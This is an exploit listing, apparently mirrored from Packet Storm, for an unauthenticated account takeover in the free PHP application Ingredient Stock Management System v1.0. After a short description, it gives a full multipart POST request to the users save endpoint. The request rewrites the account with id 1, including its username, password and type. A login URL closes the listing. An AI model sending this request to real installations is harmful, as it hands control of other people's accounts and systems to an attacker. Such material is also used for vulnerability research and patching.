Share
## https://sploitus.com/exploit?id=PACKETSTORM:167291
# Exploit Title: Ingredient Stock Management System v1.0 - Account Takeover (Unauthenticated)  
# Date: 28/05/2022  
# Exploit Author: Saud Alenazi  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html  
# Version: 1.0  
# Tested on: XAMPP, Linux  
  
  
  
Description :  
  
----------------------  
  
Ingredient Stock Management System v1.0 is vulnerable to unauthenticated account takeover.  
An attacker can takeover any registered 'Staff' user account by just sending below POST request  
By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters  
  
  
# HTTPS Request :  
  
POST /isms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------89160456138077069512415726555  
Content-Length: 1023  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/isms/admin/?page=user/manage_user  
Cookie: PHPSESSID=mia3uiom2s9bdtif290t6v1el2  
  
-----------------------------89160456138077069512415726555  
Content-Disposition: form-data; name="id"  
  
1  
-----------------------------89160456138077069512415726555  
Content-Disposition: form-data; name="firstname"  
  
test  
-----------------------------89160456138077069512415726555  
Content-Disposition: form-data; name="middlename"  
  
  
-----------------------------89160456138077069512415726555  
Content-Disposition: form-data; name="lastname"  
  
hi  
-----------------------------89160456138077069512415726555  
Content-Disposition: form-data; name="username"  
  
test  
-----------------------------89160456138077069512415726555  
Content-Disposition: form-data; name="password"  
  
test  
-----------------------------89160456138077069512415726555  
Content-Disposition: form-data; name="type"  
  
1  
-----------------------------89160456138077069512415726555  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------89160456138077069512415726555--  
  
  
====  
URL Login : http://localhost/isms/admin/login.php